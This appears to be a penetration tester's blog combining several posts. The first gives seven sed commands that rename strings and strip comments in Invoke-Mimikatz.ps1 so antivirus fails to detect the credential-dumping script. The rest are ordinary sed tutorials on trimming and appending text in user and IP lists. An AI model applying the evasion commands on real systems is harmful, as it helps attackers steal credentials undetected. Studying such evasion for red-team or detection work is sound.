In this post I will be talking about avoiding AV detection when running mimikatz with sed! I came across this on the Black Hills Information Security website, link here. Props to Carrie Roberts for sharing this. The classic Invoke-Mimikatz.ps1 from the PowerSploit suite, located here, does get detected by many anti-virus vendors. This really is great for the enterprise. However, what's not so great is the way in which AV vendors are detecting it and how easily it can be bypassed! Yes, AV can easily be bypassed by modifying the PowerShell file. Using 'sed' in bash we can swap out various strings in the ps1 file, for example swapping out mimikatz for mimidogz, as in line 1 below.
I have talked about slowing down attackers who are using mimikatz in this post. This is where we can deny access to the clear text credentials in early versions of Windows (up to Windows 7). In later versions of Windows (8 and above) we can deny access to the hash and the clear text credentials. This will only slow attackers down though, as the OS can be modified; however, doing so will make noise on the network. This really is a must for slowing down attackers. Harden your systems!
Below are the sed commands:
sed -i -e 's/Invoke-Mimikatz/Invoke-Mimidogz/g' Invoke-Mimikatz.ps1
sed -i -e '/<#/,/#>/c\\' Invoke-Mimikatz.ps1
sed -i -e 's/^[[:space:]]*#.*$//g' Invoke-Mimikatz.ps1
sed -i -e 's/DumpCreds/DumpCred/g' Invoke-Mimikatz.ps1
sed -i -e 's/ArgumentPtr/NotTodayPal/g' Invoke-Mimikatz.ps1
sed -i -e 's/CallDllMainSC1/ThisIsNotTheStringYouAreLookingFor/g' Invoke-Mimikatz.ps1
sed -i -e "s/\-Win32Functions \$Win32Functions$/\-Win32Functions \$Win32Functions #\-/g" Invoke-Mimikatz.ps1
How do we remove specific text from each line in a text file in Linux? In this post we cover using Sed to remove text from a line in Linux.
We previously covered in this post adding text to a line in Linux. In this post we will be specifically talking about the opposite. Using sed to remove text from a line in Linux is fairly straightforward. To remove specific characters or a portion of text from a line in Linux we can use the command-line tool sed. sed is used to perform basic text transformations; more info on sed can be found here. In the example below we want to remove ‘BARRY\’ from a line. Each character listed inside the square brackets [text to remove] is removed wherever it appears, so we use:
cat users | grep BARRY | cut -d" " -f 2 | sed 's/[BARRY\]//g'
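The chain above, run against a small constructed users file, as an added example (not code from the original post). The sample data assumes each line is "<id> <name>". It shows the two readings of the removal pattern side by side: the bracket-expression form the post uses, which deletes any single character from the set B, A, R, Y or backslash, and a literal-string form that deletes only the exact prefix "BARRY\".

```shell
#!/bin/sh
# Added example: constructed sample data standing in for the 'users' file.
# Lines are assumed to be "<id> <name>"; the domain prefix uses a literal backslash.
sample_users() {
  printf '%s\n' '1001 BARRY\admin' '1002 BARRY\ARCHIE' '1003 larry'
}

# The post's form: [BARRY\] is a bracket expression, so sed deletes every
# occurrence of any of the characters B, A, R, Y or backslash, not the word
# as a whole. Names that contain those capitals lose them too.
strip_bracket() {
  sample_users | grep BARRY | cut -d" " -f 2 | sed 's/[BARRY\]//g'
}

# Literal form: the backslash is escaped so sed matches the whole string
# "BARRY\" and leaves the rest of the user name untouched.
strip_literal() {
  sample_users | grep BARRY | cut -d" " -f 2 | sed 's/BARRY\\//g'
}

echo "bracket expression:"
strip_bracket     # admin / CHIE   (A and R stripped out of ARCHIE)
echo "literal string:"
strip_literal     # admin / ARCHIE
```

The bracket form happens to work when the remaining text contains none of the listed characters, which is why it can look correct on a small sample; the literal form is the safer habit when the goal is to drop a fixed prefix.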
Hopefully you will find this useful!
Using sed to add text to the end of each line in Linux.
In this example we are going to use sed to add text to the end of each line in Linux. More specifically, to each line in a text file, using a bash one-liner! Why would we want to do this? There are multiple reasons if you are a penetration tester: creating user name lists, or adding ports to the end of IP addresses, for example. sed is used to perform basic text transformations; you can read more about it here.
So for example if we wanted to add ‘:80’ to the end of each line for a list of IP address we would do the following:
~$ sed 's/$/:80/' IP.txt > new_IP.txt
Or if we found we wanted to add ‘adm’ to the end of each line in a list of user names we would also use sed.
~$ sed 's/$/adm/' admins.txt > new_admins.txt
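The two one-liners above, run against constructed IP and user lists, as an added example (not the post's own code). Beyond the post's exact form it also shows the one edge case that bites in practice, a blank line in the input, and the equivalent `&` replacement form; the input values and the domain name are assumptions made up for the example.

```shell
#!/bin/sh
# Added example: constructed input lists standing in for IP.txt and admins.txt.
# The IP list deliberately ends with a blank line to show the edge case.
sample_ips()    { printf '%s\n' '10.0.0.1' '10.0.0.2' ''; }
sample_admins() { printf '%s\n' 'alice' 'bob'; }

# The post's form: '$' anchors at end of line, so the replacement is appended.
# A blank input line becomes just ":80".
add_port() { sample_ips | sed 's/$/:80/'; }

# Same, but the address /^$/! restricts the substitution to non-blank lines,
# so empty entries stay empty instead of turning into a bogus ":80".
add_port_nonblank() { sample_ips | sed '/^$/!s/$/:80/'; }

# The post's second form: append a fixed suffix to each user name.
add_suffix() { sample_admins | sed 's/$/adm/'; }

# Equivalent using '&' (the whole matched text) in the replacement; handy when
# the line also needs something in front of it, e.g. a domain-style address.
add_domain() { sample_admins | sed 's/.*/&@corp.example/'; }

echo "port appended:";             add_port
echo "port appended, non-blank:";  add_port_nonblank
echo "suffix appended:";           add_suffix
echo "domain appended:";           add_domain
```

Redirecting the output to a new file, as the post does with `> new_IP.txt`, works the same with any of these; the `/^$/!` guard is worth keeping whenever the input list was pasted or exported and may carry trailing empty lines.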
Having these small bash commands to hand is super useful. As a penetration tester I always find that I need to script something in Bash or PowerShell, or need to produce one-liners. Having these commands ready and waiting saves time looking them up. Hopefully you will also find them useful. Don't forget the man pages for bash commands. Practice, practice and more practice.